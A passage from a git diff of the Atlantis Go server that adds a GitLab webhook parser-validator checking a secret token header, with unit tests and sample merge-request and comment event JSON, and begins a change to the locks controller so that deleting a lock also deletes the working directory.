- req.Header.Set("X-Gitlab-Token", "random secret")
- req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
- b, err := parser.Validate(req, nil)
- Ok(t, err)
- Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
-}
-
-func TestValidate_InvalidMergeEvent(t *testing.T) {
- t.Log("If the merge event is malformed there should be an error")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString("{")
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
- _, err = parser.Validate(req, nil)
- Assert(t, err != nil, "should be an error")
- Equals(t, "unexpected end of JSON input", err.Error())
-}
-
-func TestValidate_InvalidMergeCommentEvent(t *testing.T) {
- t.Log("If the merge comment event is malformed there should be an error")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString("{")
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Note Hook")
- _, err = parser.Validate(req, nil)
- Assert(t, err != nil, "should be an error")
- Equals(t, "unexpected end of JSON input", err.Error())
-}
-
-func TestValidate_UnrecognizedEvent(t *testing.T) {
- t.Log("If the event is not one we care about we return nil")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString("")
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Random Event")
- event, err := parser.Validate(req, nil)
- Ok(t, err)
- Equals(t, nil, event)
-}
-
-func TestValidate_ValidMergeEvent(t *testing.T) {
- t.Log("If the merge event is valid it should be returned")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString(mergeEventJSON)
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
- b, err := parser.Validate(req, nil)
- Ok(t, err)
- Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
- RegisterMockTestingT(t)
-}
-
-func TestValidate_ValidMergeCommentEvent(t *testing.T) {
- t.Log("If the merge comment event is valid it should be returned")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString(mergeCommentEventJSON)
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Note Hook")
- b, err := parser.Validate(req, nil)
- Ok(t, err)
- Equals(t, "Gitlab Test", b.(gitlab.MergeCommentEvent).Project.Name)
- RegisterMockTestingT(t)
-}
-
-var mergeEventJSON = `{
- "object_kind": "merge_request",
- "user": {
- "name": "Administrator",
- "username": "root",
- "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
- },
- "project": {
- "id": 1,
- "name":"Gitlab Test",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/gitlabhq/gitlab-test",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
- "namespace":"GitlabHQ",
- "visibility_level":20,
- "path_with_namespace":"gitlabhq/gitlab-test",
- "default_branch":"master",
- "homepage":"http://example.com/gitlabhq/gitlab-test",
- "url":"https://example.com/gitlabhq/gitlab-test.git",
- "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "http_url":"https://example.com/gitlabhq/gitlab-test.git"
- },
- "repository": {
- "name": "Gitlab Test",
- "url": "https://example.com/gitlabhq/gitlab-test.git",
- "description": "Aut reprehenderit ut est.",
- "homepage": "http://example.com/gitlabhq/gitlab-test"
- },
- "object_attributes": {
- "id": 99,
- "target_branch": "master",
- "source_branch": "ms-viewport",
- "source_project_id": 14,
- "author_id": 51,
- "assignee_id": 6,
- "title": "MS-Viewport",
- "created_at": "2013-12-03T17:23:34Z",
- "updated_at": "2013-12-03T17:23:34Z",
- "st_commits": null,
- "st_diffs": null,
- "milestone_id": null,
- "state": "opened",
- "merge_status": "unchecked",
- "target_project_id": 14,
- "iid": 1,
- "description": "",
- "source": {
- "name":"Awesome Project",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/awesome_space/awesome_project",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:awesome_space/awesome_project.git",
- "git_http_url":"http://example.com/awesome_space/awesome_project.git",
- "namespace":"Awesome Space",
- "visibility_level":20,
- "path_with_namespace":"awesome_space/awesome_project",
- "default_branch":"master",
- "homepage":"http://example.com/awesome_space/awesome_project",
- "url":"http://example.com/awesome_space/awesome_project.git",
- "ssh_url":"git@example.com:awesome_space/awesome_project.git",
- "http_url":"http://example.com/awesome_space/awesome_project.git"
- },
- "target": {
- "name":"Awesome Project",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/awesome_space/awesome_project",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:awesome_space/awesome_project.git",
- "git_http_url":"http://example.com/awesome_space/awesome_project.git",
- "namespace":"Awesome Space",
- "visibility_level":20,
- "path_with_namespace":"awesome_space/awesome_project",
- "default_branch":"master",
- "homepage":"http://example.com/awesome_space/awesome_project",
- "url":"http://example.com/awesome_space/awesome_project.git",
- "ssh_url":"git@example.com:awesome_space/awesome_project.git",
- "http_url":"http://example.com/awesome_space/awesome_project.git"
- },
- "last_commit": {
- "id": "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
- "message": "fixed readme",
- "timestamp": "2012-01-03T23:36:29+02:00",
- "url": "http://example.com/awesome_space/awesome_project/commits/da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
- "author": {
- "name": "GitLab dev user",
- "email": "gitlabdev@dv6700.(none)"
- }
- },
- "work_in_progress": false,
- "url": "http://example.com/diaspora/merge_requests/1",
- "action": "open",
- "assignee": {
- "name": "User1",
- "username": "user1",
- "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
- }
- },
- "labels": [{
- "id": 206,
- "title": "API",
- "color": "#ffffff",
- "project_id": 14,
- "created_at": "2013-12-03T17:15:43Z",
- "updated_at": "2013-12-03T17:15:43Z",
- "template": false,
- "description": "API related issues",
- "type": "ProjectLabel",
- "group_id": 41
- }],
- "changes": {
- "updated_by_id": [null, 1],
- "updated_at": ["2017-09-15 16:50:55 UTC", "2017-09-15 16:52:00 UTC"],
- "labels": {
- "previous": [{
- "id": 206,
- "title": "API",
- "color": "#ffffff",
- "project_id": 14,
- "created_at": "2013-12-03T17:15:43Z",
- "updated_at": "2013-12-03T17:15:43Z",
- "template": false,
- "description": "API related issues",
- "type": "ProjectLabel",
- "group_id": 41
- }],
- "current": [{
- "id": 205,
- "title": "Platform",
- "color": "#123123",
- "project_id": 14,
- "created_at": "2013-12-03T17:15:43Z",
- "updated_at": "2013-12-03T17:15:43Z",
- "template": false,
- "description": "Platform related issues",
- "type": "ProjectLabel",
- "group_id": 41
- }]
- }
- }
-}`
-
-var mergeCommentEventJSON = `{
- "object_kind": "note",
- "user": {
- "name": "Administrator",
- "username": "root",
- "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
- },
- "project_id": 5,
- "project":{
- "id": 5,
- "name":"Gitlab Test",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/gitlabhq/gitlab-test",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
- "namespace":"Gitlab Org",
- "visibility_level":10,
- "path_with_namespace":"gitlabhq/gitlab-test",
- "default_branch":"master",
- "homepage":"http://example.com/gitlabhq/gitlab-test",
- "url":"https://example.com/gitlabhq/gitlab-test.git",
- "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "http_url":"https://example.com/gitlabhq/gitlab-test.git"
- },
- "repository":{
- "name": "Gitlab Test",
- "url": "http://localhost/gitlab-org/gitlab-test.git",
- "description": "Aut reprehenderit ut est.",
- "homepage": "http://example.com/gitlab-org/gitlab-test"
- },
- "object_attributes": {
- "id": 1244,
- "note": "This MR needs work.",
- "noteable_type": "MergeRequest",
- "author_id": 1,
- "created_at": "2015-05-17",
- "updated_at": "2015-05-17",
- "project_id": 5,
- "attachment": null,
- "line_code": null,
- "commit_id": "",
- "noteable_id": 7,
- "system": false,
- "st_diff": null,
- "url": "http://example.com/gitlab-org/gitlab-test/merge_requests/1#note_1244"
- },
- "merge_request": {
- "id": 7,
- "target_branch": "markdown",
- "source_branch": "master",
- "source_project_id": 5,
- "author_id": 8,
- "assignee_id": 28,
- "title": "Tempora et eos debitis quae laborum et.",
- "created_at": "2015-03-01 20:12:53 UTC",
- "updated_at": "2015-03-21 18:27:27 UTC",
- "milestone_id": 11,
- "state": "opened",
- "merge_status": "cannot_be_merged",
- "target_project_id": 5,
- "iid": 1,
- "description": "Et voluptas corrupti assumenda temporibus. Architecto cum animi eveniet amet asperiores. Vitae numquam voluptate est natus sit et ad id.",
- "position": 0,
- "source":{
- "name":"Gitlab Test",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/gitlab-org/gitlab-test",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:gitlab-org/gitlab-test.git",
- "git_http_url":"https://example.com/gitlab-org/gitlab-test.git",
- "namespace":"Gitlab Org",
- "visibility_level":10,
- "path_with_namespace":"gitlab-org/gitlab-test",
- "default_branch":"master",
- "homepage":"http://example.com/gitlab-org/gitlab-test",
- "url":"https://example.com/gitlab-org/gitlab-test.git",
- "ssh_url":"git@example.com:gitlab-org/gitlab-test.git",
- "http_url":"https://example.com/gitlab-org/gitlab-test.git",
- "git_http_url":"https://example.com/gitlab-org/gitlab-test.git"
- },
- "target": {
- "name":"Gitlab Test",
- "description":"Aut reprehenderit ut est.",
- "web_url":"http://example.com/gitlabhq/gitlab-test",
- "avatar_url":null,
- "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
- "namespace":"Gitlab Org",
- "visibility_level":10,
- "path_with_namespace":"gitlabhq/gitlab-test",
- "default_branch":"master",
- "homepage":"http://example.com/gitlabhq/gitlab-test",
- "url":"https://example.com/gitlabhq/gitlab-test.git",
- "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
- "http_url":"https://example.com/gitlabhq/gitlab-test.git"
- },
- "last_commit": {
- "id": "562e173be03b8ff2efb05345d12df18815438a4b",
- "message": "Merge branch 'another-branch' into 'master'\n\nCheck in this test\n",
- "timestamp": "2002-10-02T10:00:00-05:00",
- "url": "http://example.com/gitlab-org/gitlab-test/commit/562e173be03b8ff2efb05345d12df18815438a4b",
- "author": {
- "name": "John Smith",
- "email": "john@example.com"
- }
- },
- "work_in_progress": false,
- "assignee": {
- "name": "User1",
- "username": "user1",
- "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
- }
- }
-}`
diff --git a/server/gitlab_request_parser_validator.go b/server/gitlab_request_parser_validator.go
new file mode 100644
index 0000000000..ee486248f9
--- /dev/null
+++ b/server/gitlab_request_parser_validator.go
@@ -0,0 +1,90 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package server
+
+import (
+ "encoding/json"
+ "fmt"
+ "io/ioutil"
+ "net/http"
+
+ "github.com/lkysow/go-gitlab"
+)
+
+const secretHeader = "X-Gitlab-Token" // #nosec
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser_validator.go GitlabRequestParserValidator
+
+// GitlabRequestParserValidator parses and validates GitLab requests.
+type GitlabRequestParserValidator interface {
+ // ParseAndValidate validates that the request has a token header matching secret.
+ // If the secret does not match it returns an error.
+ // If secret is empty it does not check the token header.
+ // It then parses the request as a GitLab object depending on the header
+ // provided by GitLab identifying the webhook type. If the webhook type
+ // is not recognized it will return nil but will not return an error.
+ // Usage:
+ // event, err := GitlabRequestParserValidator.ParseAndValidate(r, secret)
+ // if err != nil {
+ // return
+ // }
+ // switch event := event.(type) {
+ // case gitlab.MergeCommentEvent:
+ // // handle
+ // case gitlab.MergeEvent:
+ // // handle
+ // default:
+ // // unsupported event
+ // }
+ ParseAndValidate(r *http.Request, secret []byte) (interface{}, error)
+}
+
+// DefaultGitlabRequestParserValidator parses and validates GitLab requests.
+type DefaultGitlabRequestParserValidator struct{}
+
+// ParseAndValidate returns the JSON payload of the request.
+// See GitlabRequestParserValidator.ParseAndValidate().
+func (d *DefaultGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) {
+ const mergeEventHeader = "Merge Request Hook"
+ const noteEventHeader = "Note Hook"
+
+ // Validate secret if specified.
+ headerSecret := r.Header.Get(secretHeader)
+ secretStr := string(secret)
+ if len(secret) != 0 && headerSecret != secretStr {
+ return nil, fmt.Errorf("header %s=%s did not match expected secret", secretHeader, headerSecret)
+ }
+
+ // Parse request into a gitlab object based on the object type specified
+ // in the gitlabHeader.
+ bytes, err := ioutil.ReadAll(r.Body)
+ if err != nil {
+ return nil, err
+ }
+ switch r.Header.Get(gitlabHeader) {
+ case mergeEventHeader:
+ var m gitlab.MergeEvent
+ if err := json.Unmarshal(bytes, &m); err != nil {
+ return nil, err
+ }
+ return m, nil
+ case noteEventHeader:
+ var m gitlab.MergeCommentEvent
+ if err := json.Unmarshal(bytes, &m); err != nil {
+ return nil, err
+ }
+ return m, nil
+ }
+ return nil, nil
+}
diff --git a/server/gitlab_request_parser_validator_test.go b/server/gitlab_request_parser_validator_test.go
new file mode 100644
index 0000000000..eacbc1d4a2
--- /dev/null
+++ b/server/gitlab_request_parser_validator_test.go
@@ -0,0 +1,386 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package server_test
+
+import (
+ "bytes"
+ "net/http"
+ "testing"
+
+ "github.com/lkysow/go-gitlab"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+var parser = server.DefaultGitlabRequestParserValidator{}
+
+func TestValidate_InvalidSecret(t *testing.T) {
+ t.Log("If the secret header is set and doesn't match expected an error is returned")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString("")
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Token", "does-not-match")
+ _, err = parser.ParseAndValidate(req, []byte("secret"))
+ Assert(t, err != nil, "should be an error")
+ Equals(t, "header X-Gitlab-Token=does-not-match did not match expected secret", err.Error())
+}
+
+func TestValidate_ValidSecret(t *testing.T) {
+ t.Log("If the secret header matches then the event is returned")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString(mergeEventJSON)
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Token", "secret")
+ req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
+ b, err := parser.ParseAndValidate(req, []byte("secret"))
+ Ok(t, err)
+ Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
+}
+
+func TestValidate_NoSecret(t *testing.T) {
+ t.Log("If there is no secret then we ignore the secret header and return the event")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString(mergeEventJSON)
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Token", "random secret")
+ req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
+ b, err := parser.ParseAndValidate(req, nil)
+ Ok(t, err)
+ Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
+}
+
+func TestValidate_InvalidMergeEvent(t *testing.T) {
+ t.Log("If the merge event is malformed there should be an error")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString("{")
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
+ _, err = parser.ParseAndValidate(req, nil)
+ Assert(t, err != nil, "should be an error")
+ Equals(t, "unexpected end of JSON input", err.Error())
+}
+
+func TestValidate_InvalidMergeCommentEvent(t *testing.T) {
+ t.Log("If the merge comment event is malformed there should be an error")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString("{")
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Note Hook")
+ _, err = parser.ParseAndValidate(req, nil)
+ Assert(t, err != nil, "should be an error")
+ Equals(t, "unexpected end of JSON input", err.Error())
+}
+
+func TestValidate_UnrecognizedEvent(t *testing.T) {
+ t.Log("If the event is not one we care about we return nil")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString("")
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Random Event")
+ event, err := parser.ParseAndValidate(req, nil)
+ Ok(t, err)
+ Equals(t, nil, event)
+}
+
+func TestValidate_ValidMergeEvent(t *testing.T) {
+ t.Log("If the merge event is valid it should be returned")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString(mergeEventJSON)
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
+ b, err := parser.ParseAndValidate(req, nil)
+ Ok(t, err)
+ Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
+ RegisterMockTestingT(t)
+}
+
+func TestValidate_ValidMergeCommentEvent(t *testing.T) {
+ t.Log("If the merge comment event is valid it should be returned")
+ RegisterMockTestingT(t)
+ buf := bytes.NewBufferString(mergeCommentEventJSON)
+ req, err := http.NewRequest("POST", "http://localhost/event", buf)
+ Ok(t, err)
+ req.Header.Set("X-Gitlab-Event", "Note Hook")
+ b, err := parser.ParseAndValidate(req, nil)
+ Ok(t, err)
+ Equals(t, "Gitlab Test", b.(gitlab.MergeCommentEvent).Project.Name)
+ RegisterMockTestingT(t)
+}
+
+var mergeEventJSON = `{
+ "object_kind": "merge_request",
+ "user": {
+ "name": "Administrator",
+ "username": "root",
+ "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
+ },
+ "project": {
+ "id": 1,
+ "name":"Gitlab Test",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/gitlabhq/gitlab-test",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
+ "namespace":"GitlabHQ",
+ "visibility_level":20,
+ "path_with_namespace":"gitlabhq/gitlab-test",
+ "default_branch":"master",
+ "homepage":"http://example.com/gitlabhq/gitlab-test",
+ "url":"https://example.com/gitlabhq/gitlab-test.git",
+ "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "http_url":"https://example.com/gitlabhq/gitlab-test.git"
+ },
+ "repository": {
+ "name": "Gitlab Test",
+ "url": "https://example.com/gitlabhq/gitlab-test.git",
+ "description": "Aut reprehenderit ut est.",
+ "homepage": "http://example.com/gitlabhq/gitlab-test"
+ },
+ "object_attributes": {
+ "id": 99,
+ "target_branch": "master",
+ "source_branch": "ms-viewport",
+ "source_project_id": 14,
+ "author_id": 51,
+ "assignee_id": 6,
+ "title": "MS-Viewport",
+ "created_at": "2013-12-03T17:23:34Z",
+ "updated_at": "2013-12-03T17:23:34Z",
+ "st_commits": null,
+ "st_diffs": null,
+ "milestone_id": null,
+ "state": "opened",
+ "merge_status": "unchecked",
+ "target_project_id": 14,
+ "iid": 1,
+ "description": "",
+ "source": {
+ "name":"Awesome Project",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/awesome_space/awesome_project",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:awesome_space/awesome_project.git",
+ "git_http_url":"http://example.com/awesome_space/awesome_project.git",
+ "namespace":"Awesome Space",
+ "visibility_level":20,
+ "path_with_namespace":"awesome_space/awesome_project",
+ "default_branch":"master",
+ "homepage":"http://example.com/awesome_space/awesome_project",
+ "url":"http://example.com/awesome_space/awesome_project.git",
+ "ssh_url":"git@example.com:awesome_space/awesome_project.git",
+ "http_url":"http://example.com/awesome_space/awesome_project.git"
+ },
+ "target": {
+ "name":"Awesome Project",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/awesome_space/awesome_project",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:awesome_space/awesome_project.git",
+ "git_http_url":"http://example.com/awesome_space/awesome_project.git",
+ "namespace":"Awesome Space",
+ "visibility_level":20,
+ "path_with_namespace":"awesome_space/awesome_project",
+ "default_branch":"master",
+ "homepage":"http://example.com/awesome_space/awesome_project",
+ "url":"http://example.com/awesome_space/awesome_project.git",
+ "ssh_url":"git@example.com:awesome_space/awesome_project.git",
+ "http_url":"http://example.com/awesome_space/awesome_project.git"
+ },
+ "last_commit": {
+ "id": "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
+ "message": "fixed readme",
+ "timestamp": "2012-01-03T23:36:29+02:00",
+ "url": "http://example.com/awesome_space/awesome_project/commits/da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
+ "author": {
+ "name": "GitLab dev user",
+ "email": "gitlabdev@dv6700.(none)"
+ }
+ },
+ "work_in_progress": false,
+ "url": "http://example.com/diaspora/merge_requests/1",
+ "action": "open",
+ "assignee": {
+ "name": "User1",
+ "username": "user1",
+ "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
+ }
+ },
+ "labels": [{
+ "id": 206,
+ "title": "API",
+ "color": "#ffffff",
+ "project_id": 14,
+ "created_at": "2013-12-03T17:15:43Z",
+ "updated_at": "2013-12-03T17:15:43Z",
+ "template": false,
+ "description": "API related issues",
+ "type": "ProjectLabel",
+ "group_id": 41
+ }],
+ "changes": {
+ "updated_by_id": [null, 1],
+ "updated_at": ["2017-09-15 16:50:55 UTC", "2017-09-15 16:52:00 UTC"],
+ "labels": {
+ "previous": [{
+ "id": 206,
+ "title": "API",
+ "color": "#ffffff",
+ "project_id": 14,
+ "created_at": "2013-12-03T17:15:43Z",
+ "updated_at": "2013-12-03T17:15:43Z",
+ "template": false,
+ "description": "API related issues",
+ "type": "ProjectLabel",
+ "group_id": 41
+ }],
+ "current": [{
+ "id": 205,
+ "title": "Platform",
+ "color": "#123123",
+ "project_id": 14,
+ "created_at": "2013-12-03T17:15:43Z",
+ "updated_at": "2013-12-03T17:15:43Z",
+ "template": false,
+ "description": "Platform related issues",
+ "type": "ProjectLabel",
+ "group_id": 41
+ }]
+ }
+ }
+}`
+
+var mergeCommentEventJSON = `{
+ "object_kind": "note",
+ "user": {
+ "name": "Administrator",
+ "username": "root",
+ "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
+ },
+ "project_id": 5,
+ "project":{
+ "id": 5,
+ "name":"Gitlab Test",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/gitlabhq/gitlab-test",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
+ "namespace":"Gitlab Org",
+ "visibility_level":10,
+ "path_with_namespace":"gitlabhq/gitlab-test",
+ "default_branch":"master",
+ "homepage":"http://example.com/gitlabhq/gitlab-test",
+ "url":"https://example.com/gitlabhq/gitlab-test.git",
+ "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "http_url":"https://example.com/gitlabhq/gitlab-test.git"
+ },
+ "repository":{
+ "name": "Gitlab Test",
+ "url": "http://localhost/gitlab-org/gitlab-test.git",
+ "description": "Aut reprehenderit ut est.",
+ "homepage": "http://example.com/gitlab-org/gitlab-test"
+ },
+ "object_attributes": {
+ "id": 1244,
+ "note": "This MR needs work.",
+ "noteable_type": "MergeRequest",
+ "author_id": 1,
+ "created_at": "2015-05-17",
+ "updated_at": "2015-05-17",
+ "project_id": 5,
+ "attachment": null,
+ "line_code": null,
+ "commit_id": "",
+ "noteable_id": 7,
+ "system": false,
+ "st_diff": null,
+ "url": "http://example.com/gitlab-org/gitlab-test/merge_requests/1#note_1244"
+ },
+ "merge_request": {
+ "id": 7,
+ "target_branch": "markdown",
+ "source_branch": "master",
+ "source_project_id": 5,
+ "author_id": 8,
+ "assignee_id": 28,
+ "title": "Tempora et eos debitis quae laborum et.",
+ "created_at": "2015-03-01 20:12:53 UTC",
+ "updated_at": "2015-03-21 18:27:27 UTC",
+ "milestone_id": 11,
+ "state": "opened",
+ "merge_status": "cannot_be_merged",
+ "target_project_id": 5,
+ "iid": 1,
+ "description": "Et voluptas corrupti assumenda temporibus. Architecto cum animi eveniet amet asperiores. Vitae numquam voluptate est natus sit et ad id.",
+ "position": 0,
+ "source":{
+ "name":"Gitlab Test",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/gitlab-org/gitlab-test",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:gitlab-org/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlab-org/gitlab-test.git",
+ "namespace":"Gitlab Org",
+ "visibility_level":10,
+ "path_with_namespace":"gitlab-org/gitlab-test",
+ "default_branch":"master",
+ "homepage":"http://example.com/gitlab-org/gitlab-test",
+ "url":"https://example.com/gitlab-org/gitlab-test.git",
+ "ssh_url":"git@example.com:gitlab-org/gitlab-test.git",
+ "http_url":"https://example.com/gitlab-org/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlab-org/gitlab-test.git"
+ },
+ "target": {
+ "name":"Gitlab Test",
+ "description":"Aut reprehenderit ut est.",
+ "web_url":"http://example.com/gitlabhq/gitlab-test",
+ "avatar_url":null,
+ "git_ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "git_http_url":"https://example.com/gitlabhq/gitlab-test.git",
+ "namespace":"Gitlab Org",
+ "visibility_level":10,
+ "path_with_namespace":"gitlabhq/gitlab-test",
+ "default_branch":"master",
+ "homepage":"http://example.com/gitlabhq/gitlab-test",
+ "url":"https://example.com/gitlabhq/gitlab-test.git",
+ "ssh_url":"git@example.com:gitlabhq/gitlab-test.git",
+ "http_url":"https://example.com/gitlabhq/gitlab-test.git"
+ },
+ "last_commit": {
+ "id": "562e173be03b8ff2efb05345d12df18815438a4b",
+ "message": "Merge branch 'another-branch' into 'master'\n\nCheck in this test\n",
+ "timestamp": "2002-10-02T10:00:00-05:00",
+ "url": "http://example.com/gitlab-org/gitlab-test/commit/562e173be03b8ff2efb05345d12df18815438a4b",
+ "author": {
+ "name": "John Smith",
+ "email": "john@example.com"
+ }
+ },
+ "work_in_progress": false,
+ "assignee": {
+ "name": "User1",
+ "username": "user1",
+ "avatar_url": "http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=40\u0026d=identicon"
+ }
+ }
+}`
diff --git a/server/locks_controller.go b/server/locks_controller.go
index d345b68411..140cb30460 100644
--- a/server/locks_controller.go
+++ b/server/locks_controller.go
@@ -7,6 +7,7 @@ import (
"strings"
"github.com/gorilla/mux"
+ "github.com/runatlantis/atlantis/server/events"
"github.com/runatlantis/atlantis/server/events/locking"
"github.com/runatlantis/atlantis/server/events/models"
"github.com/runatlantis/atlantis/server/events/vcs"
@@ -20,6 +21,8 @@ type LocksController struct {
Logger *logging.SimpleLogger
VCSClient vcs.ClientProxy
LockDetailTemplate TemplateWriter
+ WorkingDir events.WorkingDir
+ WorkingDirLocker events.WorkingDirLocker
}
// GetLock is the GET /locks/{id} route. It renders the lock detail view.
@@ -84,20 +87,29 @@ func (l *LocksController) DeleteLock(w http.ResponseWriter, r *http.Request) {
return
}
- // Once the lock has been deleted, comment back on the pull request.
- comment := fmt.Sprintf("**Warning**: The plan for path: `%s` workspace: `%s` was **discarded** via the Atlantis UI.\n\n"+
- "To `apply` you must run `plan` again.", lock.Project.Path, lock.Workspace)
// NOTE: Because BaseRepo was added to the PullRequest model later, previous
// installations of Atlantis will have locks in their DB that do not have
- // this field on PullRequest. We skip commenting in this case.
+ // this field on PullRequest. We skip commenting and deleting the working dir in this case.
if lock.Pull.BaseRepo != (models.Repo{}) {
+ unlock, err := l.WorkingDirLocker.TryLock(lock.Pull.BaseRepo.FullName, lock.Workspace, lock.Pull.Num)
+ if err != nil {
+ l.Logger.Err("unable to obtain working dir lock when trying to delete old plans: %s", err)
+ } else {
+ defer unlock()
+ err = l.WorkingDir.DeleteForWorkspace(lock.Pull.BaseRepo, lock.Pull, lock.Workspace)
+ l.Logger.Err("unable to delete workspace: %s", err)
+ }
+
+ // Once the lock has been deleted, comment back on the pull request.
